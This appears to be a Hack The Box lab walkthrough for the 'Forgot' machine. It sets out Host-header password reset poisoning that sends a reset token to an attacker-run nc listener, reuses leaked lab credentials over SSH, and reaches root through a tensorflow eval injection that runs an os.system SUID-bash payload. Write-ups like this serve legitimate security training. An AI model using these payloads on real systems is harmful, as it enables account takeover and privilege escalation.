Hack_The_Box_Writeups

HackTheBox – Forgot Walkthrough – In English

saksham dixit1 Comment on HackTheBox – Forgot Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.188

http://10.10.11.188/

http://10.10.11.188/forgot

Here we have a way to enumerate users (for instance, admin exists):

If we take a look at the response headers, we see that the server uses Python (probably Flask) and there are references to Varnish:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -I 10.10.11.188

Varnish is a web cache, as shown in www.varnish-software.com:

https://www.varnish-software.com/

Actually, this is noticeable when requesting the same resource multiple times. The first response takes about 2 seconds to return, whereas the following requests to the same resources only take a few milliseconds:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=admin’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# time curl ‘10.10.11.188/forgot?username=asdf’ -s >/dev/null

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ffuf -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-words.txt -u http://10.10.11.188/FUZZ

http://10.10.11.188/reset

Password reset poisoning

Since there are no more functionalities in the website and common injections do not work (SQLi / NoSQLi), we need to do a bit of research. The name of the machine (“Forgot”) and the functionality to restore forgot passwords are hints to the attack we need to perform. There is a good post by portswigger.net explaining how password reset poisoning works.

The key is to enter our managed server IP address in the Host header, so that the cache gets poisoned. Then, the legitimate user will go to our server with the reset token because the Host header was poisoned:

Sourcehttps://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

The attack seems simple. But first of all, we need to find a valid user different to admin.

Unexpectedly, there was an HTML comment in the main page with a random user:

Let’s switch to curl to poison the cache while listening on port 80 with nc:

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 80 

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl ‘10.10.11.188/forgot?username=robert-dev-87120’ -H ‘Host: 10.10.14.75’

After a few seconds, we receive a hit in nc:

Incredible, we have the password reset token. Let’s change the password then:

┌──(root㉿kali)-[/home/kali/Downloads]└─# curl ‘10.10.11.188/reset?token=MF4w1hJxE1UEomikyvZQs90ENtIXSwMbnFfn6zaVpMbkgwQllegKJobhMP31K5e1VfEpmDruujw9hyEat8juvA%3D%3D’ -d ‘password=asdf’

Now we click on send button and capture request.

to=Admin&link=http://10.10.11.188/static/sam.css&reason=&issue=Getting error while accessing search feature in enterprise platform.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# curl -I http://10.10.11.188/static/sam.css

Now copy the cookie value and update the cookie value on browser and then try to access /admin_ticket

Username:diego Password: dCb#1!x0%gjq

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh diego@10.10.11.188

diego@forgot:~$ sudo –l

We are able to run a Python script as root with sudo. This is such script:

diego@forgot:~$ cat /opt/security/ml_security.py

Everything is correct, so we can’t get easy code execution by modifying the script or serializing some malicious payload with pickle. There are no Library Hijacking options either since sudo resets tne environment variables.

Code injection

The script is related to Machine Learning, but there is a suspicious function being used:

Yes, preprocess_input_exprs_arg_string. This function comes from tensorflow, and doesn’t look to be related with Machine Learning. In fact, if we search a bit, we will find that this function is vulnerable to code injection. More information at security.snyk.io.

Indeed, the version of tensorflow is vulnerable:

diego@forgot:~$ pip freeze | grep tensorflow

The injection occurs in that function because it uses eval. Therefore, we can run arbitrary Python code as root (because we are using sudo).

The variable called data comes fron the database:

diego@forgot:~$ mysql –user=diego –password=’dCb#1!x0%gjq’ –database=app

mysql> show databases;

mysql> use app;

mysql> show tables;

mysql> insert into escalate (reason) values (‘x = exec(“””__import__(“os”).system(“chmod 4755 /bin/bash”)”””)’);

mysql> exit

Now we will run the script with sudo and successfully change /bin/bash permissions:

diego@forgot:~$ ls -l /bin/bash

diego@forgot:~$ sudo /opt/security/ml_security.py

diego@forgot:~$ ls -l /bin/bash

diego@forgot:~$ bash –p

@SAKSHAM DIXIT

Hi, I’m saksham dixit

Related Posts

Hack The Box – Spectra

──(root💀kali)-[/home/kali/Downloads] └─# nmap -A 10.10.10.229 http://10.10.10.229:8081/ http://10.10.10.229/ http://spectra.htb/main/ http://spectra.htb/testing/index.php http://spectra.htb/testing/...
saksham dixit

One Comment

Leave a Reply

Your email address will not be published. Required fields are marked *